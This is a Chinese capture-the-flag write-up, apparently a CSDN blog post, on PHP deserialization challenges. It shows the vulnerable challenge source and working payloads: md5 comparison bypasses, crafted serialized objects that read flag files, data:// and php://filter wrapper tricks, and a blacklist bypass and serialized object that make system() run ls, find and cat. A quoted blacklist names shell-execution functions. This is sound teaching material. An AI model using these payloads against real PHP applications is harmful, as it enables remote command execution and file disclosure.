• CTF-反序列化

    目录

    1、BUU CODE REVIEW 1

    2、[网鼎杯 2020 青龙组]AreUSerialz

    3、[ZJCTF 2019]NiZhuanSiWei

    4、[网鼎杯 2020 朱雀组]phpweb

    1、BUU CODE REVIEW 1

    1. highlight_file(__FILE__);
    2.  
    3. class BUU {
    4.    public $correct = "";
    5.    public $input = "";
    6.  
    7.    public function __destruct() {
    8.        try {
    9.            $this->correct = base64_encode(uniqid());
    10.            if($this->correct === $this->input) {
    11.                echo file_get_contents("/flag");
    12.            }
    13.        } catch (Exception $e) {
    14.        }
    15.    }
    16. }
    17.  
    18. if($_GET['pleaseget'] === '1') {
    19.     if($_POST['pleasepost'] === '2') {
    20.         if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
    21.             unserialize($_POST['obj']);
    22.         }
    23.     }
    24. }

    md5值绕过可以用数组:md51[]=1&md52[]=2,也可以用md51=QNKCDZO&md52=s878926199a

    绕过 __destruct()里面两个值相等,把一个值的地址赋值给另一个,不管后面怎么变,他们就会一直相等:

    1. $a=new BUU();
    2. $a->correct=&$a->input;
    3. echo serialize($a);

    2、[网鼎杯 2020 青龙组]AreUSerialz

    2.  
    3. include("flag.php");
    4.  
    5. highlight_file(__FILE__);
    6.  
    7. class FileHandler {
    8.  
    9.     protected $op;
    10.     protected $filename;
    11.     protected $content;
    12.  
    13.     function __construct() {
    14.         $op = "1";
    15.         $filename = "/tmp/tmpfile";
    16.         $content = "Hello World!";
    17.         $this->process();
    18.     }
    19.  
    20.     public function process() {
    21.         if($this->op == "1") {
    22.             $this->write();
    23.         } else if($this->op == "2") {
    24.             $res = $this->read();
    25.             $this->output($res);
    26.         } else {
    27.             $this->output("Bad Hacker!");
    28.         }
    29.     }
    30.  
    31. //把content写入filemane文件里面
    32.     private function write() {
    33.         if(isset($this->filename) && isset($this->content)) {
    34.             if(strlen((string)$this->content) > 100) {
    35.                 $this->output("Too long!");
    36.                 die();
    37.             }
    38.             $res = file_put_contents($this->filename, $this->content);
    39.             if($res) $this->output("Successful!");
    40.             else $this->output("Failed!");
    41.         } else {
    42.             $this->output("Failed!");
    43.         }
    44.     }
    45.  
    46. //把filename里面的内容强回显
    47.  
    48.     private function read() {
    49.         $res = "";
    50.         if(isset($this->filename)) {
    51.             $res = file_get_contents($this->filename);
    52.         }
    53.         return $res;
    54.     }
    55.  
    56.     private function output($s) {
    57.         echo "[Result]: 
      "      ;
    58.         echo $s;
    59.     }
    60.  
    61.     function __destruct() {
    62.         if($this->op === "2")
    63.             $this->op = "1";
    64.         $this->content = "";
    65.         $this->process();
    66.     }
    67.  
    68. }
    69.  
    70. //判断输入的是不是可打印字符
    71.  
    72. function is_valid($s) {
    73.     for($i = 0; $i < strlen($s); $i++)
    74.         if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
    75.             return false;
    76.     return true;
    77. }
    78.  
    79.  
    80.  
    81. if(isset($_GET{'str'})) {
    82.  
    83.     $str = (string)$_GET['str'];
    84.     if(is_valid($str)) {
    85.         $obj = unserialize($str);
    86.     }
    87.  
    88. }

     __destruct()会自动执行,判断如果op==="2",把op="1"。我们要执行read()就要让op=2,2!==“2”,2==“2”。然后再把filename的值换为flag.php就行了。

    1. class FileHandler {
    2.         public $op = 2;
    3.         public $filename = "flag.php";
    4.         public $content;
    5.     }
    6.     $a = new FileHandler();
    7.         $b = serialize($a);
    8.         echo($b);
    str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

    3、[ZJCTF 2019]NiZhuanSiWei

    1.    
    2. $text = $_GET["text"];
    3. $file = $_GET["file"];
    4. $password = $_GET["password"];
    5. if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    6.     echo "
      ".file_get_contents($text,'r')."

      "      ;
    7.     if(preg_match("/flag/",$file)){
    8.         echo "Not now!";
    9.         exit(); 
    10.     }else{
    11.         include($file);  //useless.php
    12.         $password = unserialize($password);
    13.         echo $password;
    14.     }
    15. }
    16. else{
    17.     highlight_file(__FILE__);
    18. }
    19. ?>

    用data伪协议绕过文件读取:file_get_contents($text,'r')==="welcome to the zjctf")

    text=data://text/plain,welcome to the zjctf

    然后用php://filter伪协议 让useless.php的内容显示出来:

    file=php://filter/read=convert.base64-encode/resource=useless.php

     源码如下:

    1.   
    2.  
    3. class Flag{  //flag.php  
    4.     public $file;  
    5.     public function __tostring(){  
    6.         if(isset($this->file)){  
    7.             echo file_get_contents($this->file); 
    8.             echo "
      "      ;
    9.         return ("U R SO CLOSE !///COME ON PLZ");
    10.         }  
    11.     }  
    12. }  
    13. ?>

    __toString  当一个对象被当作一个字符串被调用,构造file="flag.php"就行了:

    text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

    源码中有这样代码:

    1. $password = unserialize($password);
    2. echo $password;

     password经过反序列化后是一个对象,用echo打印出来就是把它当做字符串,所以执行__toString()。

    4、[网鼎杯 2020 朱雀组]phpweb

    提交了两个值,一个是func 值是date  另一个是p 值是 Y-m-d h:i:s

    提交:func=file_get_contents&p=index.php查看源码:

    2.     $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    3.     function gettime($func, $p) {
    4.         $result = call_user_func($func, $p);//调调用传递函数,并返回函数运行的结果(本例中即为执行$func($p))
    5.         $a= gettype($result);
    6.         if ($a == "string") {
    7.             return $result;
    8.         } else {return "";}
    9.     }
    10.     class Test {
    11.         var $p = "Y-m-d h:i:s a";
    12.         var $func = "date";
    13.         function __destruct() {
    14.             if ($this->func != "") {
    15.                 echo gettime($this->func, $this->p);
    16.             }
    17.         }
    18.     }
    19.     $func = $_REQUEST["func"];
    20.     $p = $_REQUEST["p"];
    21.  
    22.     if ($func != null) {//非空
    23.         $func = strtolower($func);//转小写
    24.         if (!in_array($func,$disable_fun)) {//判断是否存在黑名单
    25.             echo gettime($func, $p);//如果不存在则调用gettime,把funchep传入
    26.         }else {
    27.             die("Hacker...");//报错
    28.         }
    29.     }
    30.     ?>

    1.黑名单绕过

    黑名单绕过:func=\system&p=ls

    查找flag :func=\system&p=find / -name flag*

    打印flag:func=\system&p=cat /tmp/flagoefiu4r93

     2、反序列化

    1.  class Test {
    2.         var $p = "Y-m-d h:i:s a";
    3.         var $func = "date";
    4.         function __destruct() {
    5.             if ($this->func != "") {
    6.                 echo gettime($this->func, $this->p);
    7.             }
    8.         }
    9.     }

    构造

    1. class Test {
    2.     var $p = "ls";
    3.     var $func = "system";
    4.     function __destruct() {
    5.         if ($this->func != "") {
    6.             echo 1;
    7.         }
    8.     }
    9. }
    10. $a=new Test();
    11. $b=serialize($a);
    12. echo $b;

    func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

    成功执行:

    然后改变func和p继续查找flag就行了: 

    func=unserialize&p=O:4:"Test":2{s:1:"p";s:22:"cat/tmp/flagoefiu4r93";s:4:"func";s:6:"system";}

    5、[安洵杯 2019]easy_serialize_php 

    phpinfo()里面发现flag文件d0g3_f1ag.php“”

     暂时看不懂

  • 相关阅读:
    容器多机部署eureka及相关集群服务出现 Request execution failed with message: AuthScheme is null
    nacos微服务云开发,远程联调部署,内网穿透,frp部署
    分类预测 | Matlab实现基于MIC-BP-Adaboost最大互信息系数数据特征选择算法结合Adaboost-BP神经网络的数据分类预测
    随笔记:重新认识 else if
    公式编辑器Axmath+公式识别器SimpleTex+Markdown编辑器Typora
    Kotlin中的数组
    MySQL性能优化的5个维度
    Day42:网易云项目,路由进阶
    [附源码]Python计算机毕业设计Django的桌游信息管理系统
    代码随想录阅读笔记-哈希表【两个数组的交集】
  • 原文地址:https://blog.csdn.net/qq_61774705/article/details/126330449